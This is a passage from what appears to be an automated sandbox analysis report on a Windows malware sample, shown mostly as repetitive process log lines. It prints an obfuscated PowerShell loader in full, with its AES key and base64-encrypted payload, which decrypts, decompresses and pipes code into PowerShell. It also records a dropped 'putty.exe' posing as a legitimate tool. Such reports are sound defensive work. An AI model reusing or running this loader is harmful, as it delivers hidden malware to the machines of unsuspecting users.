'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - Jump to behavior
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.Trans
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.Trans
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04872D04 pushfd ; iretd 5_2_04872D05
Source: C:\Users\user\putty.exeCode function: 10_2_0045126F push ecx; ret 10_2_0045127F
Source: C:\Users\user\putty.exeCode function: 10_2_0044ED20 push eax; ret 10_2_0044ED34
Source: C:\Users\user\putty.exeCode function: 10_2_0044ED20 push eax; ret 10_2_0044ED5C
Source: C:\Users\user\putty.exeCode function: 10_2_0044CF54 pushad ; iretd 10_2_0044CF55
Source: C:\Users\user\putty.exeCode function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004451A7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\putty.exeJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\putty.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\putty.exeJump to dropped file
Source: C:\Users\user\putty.exeCode function: 10_2_00440456 IsIconic,ShowWindow,10_2_00440456
Source: C:\Users\user\putty.exeCode function: 10_2_004424A0 SetWindowTextA,SetWindowTextA,SetWindowTextA,PostQuitMessage,CreateCaret,ShowCaret,MessageBoxA,DestroyWindow,HideCaret,BeginPaint,SelectPalette,RealizePalette,SelectObject,CreateSolidBrush,SelectObject,CreatePen,SelectObject,IntersectClipRect,ExcludeClipRect,Rectangle,SelectObject,DeleteObject,DeleteObject,SelectObject,DeleteObject,GetStockObject,GetStockObject,SelectObject,GetStockObject,SelectObject,EndPaint,ShowCaret,DestroyCaret,TranslateMessage,EnableMenuItem,IsZoomed,IsZoomed,ShowWindow,DeleteObject,IsZoomed,GetWindowLongA,GetWindowLongA,GetWindowLongA,SetWindowPos,SetWindowPos,SetWindowLongA,SetWindowLongA,SetWindowPos,IsZoomed,IsIconic,SetWindowTextA,InvalidateRect,SendMessageA,PostMessageA,CreateFileMappingA,MapViewOfFile,UnmapViewOfFile,GetModuleFileNameA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ImmGetContext,ImmGetCompositionStringW,ImmGetCompositionStringW,ImmReleaseContext,ImmGetContext,ImmSetCompositionFontA,ImmReleaseContext,KillTimer,GetCursorPos,TrackPopupMenu,GetCapture,GetScrollInfo,InvalidateRect,InvalidateRect,GetCursorPos,SendMessageA,SetCapture,ReleaseCapture,RealizePalette,UpdateColors,RealizePalette,UpdateColors,DefWindowProcA,GetKeyboardState,ScreenToClient,10_2_004424A0
Source: C:\Users\user\putty.exeCode function: 10_2_0044053C IsIconic,10_2_0044053C
Source: C:\Users\user\putty.exeCode function: 10_2_0043F5AF _strlen,_strcat,IsIconic,SetWindowTextA,10_2_0043F5AF
Source: C:\Users\user\putty.exeCode function: 10_2_0043D666 IsIconic,GetWindowPlacement,GetWindowRect,10_2_0043D666
Source: C:\Users\user\putty.exeCode function: 10_2_0043F60F _strlen,_strcat,IsIconic,SetWindowTextA,10_2_0043F60F
Source: C:\Users\user\putty.exeCode function: 10_2_004451A7 RegOpenKeyA,GetProcAddress,RegQueryValueExA,RegQueryValueExA,LoadLibraryA,RegCloseKey,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,10_2_004451A7
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
